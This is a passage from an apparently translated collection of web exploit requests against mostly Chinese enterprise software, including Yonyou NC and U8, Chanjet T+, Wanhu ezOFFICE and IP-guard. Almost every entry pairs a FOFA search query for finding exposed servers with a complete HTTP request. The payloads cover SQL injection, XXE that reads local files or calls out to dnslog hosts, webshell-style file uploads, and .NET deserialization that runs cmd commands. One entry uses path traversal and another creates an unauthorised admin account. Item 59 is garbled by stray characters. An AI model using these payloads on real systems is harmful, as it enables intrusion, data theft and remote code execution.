Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD


http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"


Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}


Step 2: access the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


: @( K" d7 S6 \59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行# r: W9 j/ |; E  {
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd": Z5 m' r7 w( a. h) V, p
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
3 i: I$ G, {1 T) n, ?Host: 192.168.86.128:9090
7 F! }1 w- h  R6 _+ c, WUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
: l; }3 Z, a7 d4 [4 q- ~Connection: close, a; Q3 ^. ~3 g+ z  y# O* m$ `+ d
Content-Length: 1669
1 O! _% C( e& @Accept: */*- f1 I/ i7 {9 Y5 x* D
Accept-Language: en9 y5 A  j' a: T8 v5 g2 p, }
Content-Type: application/x-www-form-urlencoded8 L7 E1 T1 U; w8 b6 {/ `1 x
Accept-Encoding: gzip5 _! o* L6 r6 R# X

2 t. u  [8 s) Z, K- VPAYLOAD
4 k6 B- i9 T! U% O, O! {) ~
. S- a+ U$ U8 O9 V. ~* N" U; R& W  G# g$ S
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 (Zhejiang University Enter) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 (Jiecheng) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 (Youkate Lianaiyun) one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 (Bangyong) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
